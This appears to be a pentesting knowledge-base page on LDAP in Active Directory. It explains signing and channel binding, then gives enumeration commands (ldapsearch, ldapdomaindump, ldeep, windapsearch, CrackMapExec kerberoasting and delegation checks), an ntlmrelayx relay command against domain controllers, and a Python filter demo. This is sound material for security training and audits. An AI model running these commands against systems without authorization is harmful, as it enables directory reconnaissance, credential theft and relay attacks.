LDAP

Lightweight Directory Access Protocol (LDAP) holds a pivotal role for authentication and retrieving information, especially within Microsoft's Active Directory.


Last updated 1 year ago


Theory

  1. What is LDAP? LDAP, or Lightweight Directory Access Protocol, is a widely used protocol for querying and modifying directory services. It functions as a hierarchical database designed to manage and provide access to many kinds of information, including user accounts, groups, network resources, and more. LDAP operates over TCP/IP, typically on port 389, and can be secured with SSL/TLS as LDAPS (LDAP over SSL) on port 636.

  2. LDAP in Active Directory: In an Active Directory (AD) environment, LDAP is a fundamental component. AD is a centralized authentication and directory service created by Microsoft. It stores information about users, computers, groups, and other network resources in a hierarchical structure. LDAP serves as the primary means of accessing and modifying this data within AD.

  3. LDAP Objects and Attributes: LDAP organizes information in the form of objects, each with specific attributes. For instance, a user object might have attributes like 'cn' (common name), 'uid' (user ID), 'memberOf' (group memberships), and more. It is important to focus on identifying objects and their attributes to find misconfigurations or vulnerabilities.

  4. LDAP Signing involves digitally signing LDAP packets, ensuring the integrity and authenticity of data exchanged between the client and the server. This prevents attackers from tampering with or injecting malicious data into LDAP communications. When LDAP signing is enforced, Domain Controllers will not accept any authentication request without a valid signature. LDAP signing ensures that the request received by the server (Domain Controller) was sent by the client the LDAP message purports to be from. Additionally, signing certifies that the LDAP messages have not been modified or tampered with. By default, Active Directory does not require LDAP communication to be signed, which can be exploited through relay attacks.

  5. LDAP Channel Binding, on the other hand, enhances security by binding the integrity of the TLS session to the LDAP session. Basically, LDAP channel binding is the act of tying the TLS tunnel and the application layer (leveraged by LDAP) together to create a unique identifier (channel binding token) for that specific LDAP session. This channel binding token (CBT) can only be used within that TLS tunnel and therefore prevents a "stolen" LDAP ticket from being leveraged elsewhere. By default, Active Directory does not require LDAP Channel Binding to be enabled, which can be exploited through relay attacks.

Practical Exploitation:

1. Enumeration and Information Gathering: The first step is to enumerate information about the target Active Directory environment. Use the ldapsearch utility to retrieve valuable information (the first query reads the rootDSE anonymously to learn the naming contexts, i.e. the base DNs to use in later queries):

ldapsearch -x -h <target_IP> -p 389 -s base namingContexts
ldapsearch -x -h <target_IP> -p 389 -b "<base_DN>" -s sub "(objectClass=*)"

Dump LDAP info with ldapdomaindump from dirkjanm, which supports NTLM hash authentication (the username is given as DOMAIN\user):

python ldapdomaindump.py -u '<domain>\<username>' -p <password> <target_IP>

Dump LDAP info with ldeep, which supports NTLM hash and certificate authentication (the trailing `all` command collects every object type and writes the results with the given output prefix):

ldeep ldap -u <username> -p <password> -d <target_domain> -s ldap://<DC_IP> all <output_prefix>

Dump all users with windapsearch (the final -U selects the "all users" enumeration):

windapsearch -d <target_domain> -u <username> -p <password> -U

To dump LDAP information with ntlmrelayx (relaying an NTLM authentication to the Domain Controller's LDAP service, which is what the missing LDAP signing and channel binding requirements described above allow):

ntlmrelayx.py -t ldaps://<DC_IP> -

Some information can be gathered with CrackMapExec LDAP modules:

# Kerberoasting/ASRepRoasting
cme ldap <DC_IP> -u <username> -p <password> --kerberoasting output.txt

# Delegation
cme ldap <DC_IP> -u <username> -p <password> --trusted-for-delegation

# Check whether LDAP signing and channel binding are required
cme ldap <DC_IP> -u <username> -p <password> -M ldap-checker

# list PKIs/CAs
cme ldap <DC_IP> -u <username> -p <password> -M adcs

# list subnets referenced in AD Sites and Services (AD-SS)
cme ldap <DC_IP> -u <username> -p <password> -M subnets

# machine account quota
cme ldap <DC_IP> -u <username> -p <password> -M maq

# users description
cme ldap <DC_IP> -u <username> -p <password> -M get-desc-users

2. Identifying Users and Groups: To identify users and groups, leverage the '(&(objectCategory=person)(objectClass=user))' filter in ldapsearch:

ldapsearch -x -h <target_IP> -p 389 -b "<base_DN>" -s sub "(&(objectCategory=person)(objectClass=user))"

3. Exploiting Weak Permissions: Misconfigured permissions can lead to unauthorized access. Identify sensitive objects with overly permissive ACLs (here is an example that searches for every account that either has an SPN set or has the adminCount attribute equal to 1, the two sides of the `|` filter):

ldapsearch -x -h <target_IP> -p 389 -b "<base_DN>" -s sub "(|(adminCount=1)(servicePrincipalName=*))"

4. Abusing Privileged Groups: Identify users in privileged groups like Domain Admins and exploit their privileges:

ldapsearch -x -h <target_IP> -p 389 -b "<base_DN>" -s sub "(&(memberOf=CN=Domain Admins,CN=Users,<base_DN>)(objectClass=user))"
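The filters used in steps 2 to 4 above can be tried offline against a small fake directory with this added example (my own code, not from the page or from any tool it mentions): it parses the RFC 4515 filter syntax those commands use (&, |, equality, presence and * wildcards) and evaluates it over constructed entries. The base DN DC=corp,DC=local, the account names and the SPN are made up; it goes slightly beyond the page by also handling substring wildcards and case-insensitive matching, as AD does.

```python
import fnmatch
from typing import Dict, List

Entry = Dict[str, List[str]]  # attribute name -> values (LDAP attributes are multi-valued)

def _parse(s: str, i: int):
    # Recursive-descent parser for the RFC 4515 subset on this page: (&...), (|...), (attr=value)
    op = s[i + 1]
    if op in "&|":                             # AND / OR over a list of sub-filters
        kids, i = [], i + 2
        while s[i] == "(":
            kid, i = _parse(s, i)
            kids.append(kid)
        return (op, kids), i + 1               # i + 1 skips the closing ')'
    j = s.index(")", i)                        # simple item; values in these filters contain no ')'
    attr, _, value = s[i + 1:j].partition("=")
    return ("=", attr.strip().lower(), value), j + 1

def matches(node, entry: Entry) -> bool:
    if node[0] in "&|":
        combine = all if node[0] == "&" else any
        return combine(matches(k, entry) for k in node[1])
    _, attr, pattern = node
    values = [v for k, vs in entry.items() if k.lower() == attr for v in vs]
    if pattern == "*":                         # presence filter, e.g. (servicePrincipalName=*)
        return bool(values)
    # Case-insensitive compare; a '*' inside the value is a substring wildcard (fnmatch handles it)
    return any(fnmatch.fnmatchcase(v.lower(), pattern.lower()) for v in values)

# Constructed sample directory (not real data). The computer object also carries
# objectClass=user, which is why the page's user filter adds objectCategory=person.
BASE_DN = "DC=corp,DC=local"
USER = ["top", "person", "organizationalPerson", "user"]
DIRECTORY: List[Entry] = [
    {"sAMAccountName": ["alice"], "objectCategory": ["person"], "objectClass": USER,
     "memberOf": [f"CN=Domain Admins,CN=Users,{BASE_DN}"], "adminCount": ["1"]},
    {"sAMAccountName": ["svc_sql"], "objectCategory": ["person"], "objectClass": USER,
     "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"]},
    {"sAMAccountName": ["bob"], "objectCategory": ["person"], "objectClass": USER},
    {"sAMAccountName": ["WS01$"], "objectCategory": ["computer"], "objectClass": USER + ["computer"]},
]

def search(filt: str, directory: List[Entry] = DIRECTORY) -> List[str]:
    # Return the sAMAccountName of every entry matching the filter, in directory order
    node, end = _parse(filt.strip(), 0)
    if end != len(filt.strip()):
        raise ValueError("unbalanced LDAP filter")
    return [e["sAMAccountName"][0] for e in directory if matches(node, e)]
```

Running search("(objectClass=user)") returns the computer WS01$ as well, while the page's (&(objectCategory=person)(objectClass=user)) filter returns only the three user accounts.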

References:

Channel Binding
ldapdomaindump
ldeep
Windapsearch
ntlmrelayx
CrackMapExec
GitHub - dirkjanm/ldapdomaindump: Active Directory information dumper via LDAP
The Hacker Recipes - Introduction
hackndo - NTLM Relay